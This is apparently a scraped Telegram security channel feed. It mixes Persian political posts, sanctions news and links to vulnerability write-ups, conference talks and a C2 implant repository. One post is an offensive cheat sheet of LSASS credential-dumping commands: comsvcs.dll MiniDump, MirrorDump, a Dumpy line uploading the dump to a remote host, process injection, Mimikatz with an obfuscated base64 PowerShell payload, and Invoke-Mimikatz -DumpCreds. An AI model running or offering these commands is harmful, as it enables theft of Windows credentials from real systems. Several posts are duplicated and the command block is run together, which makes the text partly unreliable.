آکادمی راوین وابسته به وزارت اطلاعات امروز توسط دولت کانادا تحریم شد.
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#CVE-2023-1177:
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow
@PfkSecurity
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
فریدون فرخزاد و رسیدن به هویت ملی
بشنویم از زبان جاویدنام #فریدون_فرخزاد
#نه_به_اسلام
#نه_به_جمهوری_اسلامی
@PfkSecurity
بشنویم از زبان جاویدنام #فریدون_فرخزاد
#نه_به_اسلام
#نه_به_جمهوری_اسلامی
@PfkSecurity
Spyware vendors use 0-days and n-days against popular platforms
https://blog.google/threat-analysis-group/spyware-vendors-use-0-days-and-n-days-against-popular-platforms/
@PfkSecurity
https://blog.google/threat-analysis-group/spyware-vendors-use-0-days-and-n-days-against-popular-platforms/
@PfkSecurity
Google
Spyware vendors use 0-days and n-days against popular platforms
Google’s Threat Analysis Group (TAG) tracks actors involved in information operations (IO), government backed attacks and financially motivated abuse. For years, TAG has…
#0x41 > Comsvcs.dll
Methods:
#0x42 > MirrorDump
Methods:
#0x43 >Dumpy
Methods:
#0x44 >RToolZ+ProcExp152.sys
Methods:
#0x45>SharpUnhooker+LsassUnhooker
Methods:
#0x46 >hashdump
Methods:
#0x47 >Mimikatz+Invoke-Obfuscation
Methods:
#0x48 > BetterSafetyKatz
Methods
#lass
@PfkSecurity
Methods:
regsvr32 comsvcs.dll rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full#0x42 > MirrorDump
Methods:
.\MirrorDump.exe -f “NotLSASS.zip” -d “LegitLSAPlugin.dll” -l 1073741824#0x43 >Dumpy
Methods:
dumpy.exe dump -k secretKey -u https://remotehost/upload force#0x44 >RToolZ+ProcExp152.sys
Methods:
.\procexp64.exe -accepteula /t RToolZ -p#0x45>SharpUnhooker+LsassUnhooker
Methods:
LsassUnhooker.exe -r SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin#0x46 >hashdump
Methods:
Kldumper.exe laZagne_x64.exe PwDump7.exe QuarksPwDump.exe SqlDumper.exe Wce_x64.exe SAMInside.exe#0x47 >Mimikatz+Invoke-Obfuscation
Methods:
Invoke-Obfuscation -ScriptBlock { [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes(‘C:\mimikatz.exe’)) } -Command ‘Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“JABzAD0ATwB2AGkAZQBzAC4AQwBvAG0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAGMAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQBOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAHMAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZABvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgAZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvAHAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJwApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAdAAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzAGgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAKQBdACkA”)]))’Import-Module PowerSploit Invoke-Mimikatz -DumpCreds#0x48 > BetterSafetyKatz
Methods
: .\BetterSafetyKatz.exe .\BetterSafetyKatz.exe ‘.\mimikatz_trunk.zip’
Sekurlsa::minidump
#lass
@PfkSecurity
استفاده از دستاورد دیگران برای جذب مخاطب یک کار غیر اخلاقی دیگر است و عدم وجود مدیریت صحیح در انتشار پست ها باعث کشف RCE و Buffer Overflow میشود😂 از این رو Buffer Overflow که توسط آن ، RCE بدست امده اینگونه متلاشی میشود که یک ایرانی که سواد کافی جهت فعالیت در حوزه امنیت را ندارد شروع به نوشتن writeup میکند !
در ایران گویا دروغ گفتن عادت شده ؛ در تاریخ و ساعت :
December 21, 2018 12:21pm +0330
یک گزارش در هکروان توسط :
vinnievan
ثبت شده است ؛ لینک :
https://hackerone.com/reports/470520
گویا یک ایرانی طبق تصویر مدعی شده که توانسته Buffer Overflow از CSGO کشف کند :) گزارشی که توسط فرد / افراد دیگری گزارش شده است ! استاد شما به خودی خود یک buffer overflow ثبت نکرده بودن عزیز... !
دنیای امنیت را به گند نکشید .
#APTIran
@PfkSecurity
در ایران گویا دروغ گفتن عادت شده ؛ در تاریخ و ساعت :
December 21, 2018 12:21pm +0330
یک گزارش در هکروان توسط :
vinnievan
ثبت شده است ؛ لینک :
https://hackerone.com/reports/470520
گویا یک ایرانی طبق تصویر مدعی شده که توانسته Buffer Overflow از CSGO کشف کند :) گزارشی که توسط فرد / افراد دیگری گزارش شده است ! استاد شما به خودی خود یک buffer overflow ثبت نکرده بودن عزیز... !
دنیای امنیت را به گند نکشید .
#APTIran
@PfkSecurity
اجراهای ضبط شده از BlackHat22 رسید!
مجموعه ای از گزارش های مختلف در مورد رمزنگاری خارجی، داخلی، معکوس.
لیست پخش:
- آسیب پذیری در ماتریس.
- حملات به AFDS
- حمله به خودروهای الکتریکی
- حملات به Kerberos RC4.
- بایپس EDR؛
- حملات به قراردادهای هوشمند؛
- دور زدن WAF:
- حملات در سطح کانال.
https://yewtu.be/watch?v=V_HwRtUk5tI&list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe
@PfkSecurity
مجموعه ای از گزارش های مختلف در مورد رمزنگاری خارجی، داخلی، معکوس.
لیست پخش:
- آسیب پذیری در ماتریس.
- حملات به AFDS
- حمله به خودروهای الکتریکی
- حملات به Kerberos RC4.
- بایپس EDR؛
- حملات به قراردادهای هوشمند؛
- دور زدن WAF:
- حملات در سطح کانال.
https://yewtu.be/watch?v=V_HwRtUk5tI&list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe
@PfkSecurity
دروغ گفتن هیچوقت آیین ایرانیها نبوده
آیین ما پندار نیک، گفتار نیک و کردار نیک بود
دروغ ۱۳ هم شاملش نمی شود !
@PfkSecurity
آیین ما پندار نیک، گفتار نیک و کردار نیک بود
دروغ ۱۳ هم شاملش نمی شود !
@PfkSecurity
P.F.K Security
🎁 عیدی ما به شما آماده سازی OSWE/AWAE این پست شامل تمام آموزش ها و آموزش هایی است که می تواند برای گواهینامه OSWE امنیت تهاجمی مفید باشد. Course Syllabus: https://www.offensive-security.com/documentation/awae-syllabus.pdf به زودی در کانال قرار میگیرد…
قبل از ثبت نام در آزمایشگاه AWAE:
Get comfortable with python requests library
اگر قبلاً این کار را کرده اید، کتاب راهنمای Web Application Hacker را دوباره بخوانید
با Burpsuite آشنا شوید
با regex آشنا شوید
با 10 آسیب پذیری برتر OWASP در سال 2017 آشنا شوید
برنامه های آسیب پذیر برای تمرین در OWASP
Portswigger WebSecAcademy
مهارت های بازبینی کد - OWASP SKF را تمرین کنید
#AWAE
@PfkSecurity
Get comfortable with python requests library
اگر قبلاً این کار را کرده اید، کتاب راهنمای Web Application Hacker را دوباره بخوانید
با Burpsuite آشنا شوید
با regex آشنا شوید
با 10 آسیب پذیری برتر OWASP در سال 2017 آشنا شوید
برنامه های آسیب پذیر برای تمرین در OWASP
Portswigger WebSecAcademy
مهارت های بازبینی کد - OWASP SKF را تمرین کنید
#AWAE
@PfkSecurity
https://github.com/shogunlab/building-c2-implants-in-cpp
فایلهای کد منبع همراه کتاب کوتاه «ساخت پورتهای C2 در C++: راهنمای مبتدیان»
@pfksecurity
فایلهای کد منبع همراه کتاب کوتاه «ساخت پورتهای C2 در C++: راهنمای مبتدیان»
@pfksecurity
GitHub
GitHub - shogunlab/building-c2-implants-in-cpp: The source code files that accompany the short book "Building C2 Implants in C++:…
The source code files that accompany the short book "Building C2 Implants in C++: A Primer" by Steven Patterson (@shogun_lab). - shogunlab/building-c2-implants-in-cpp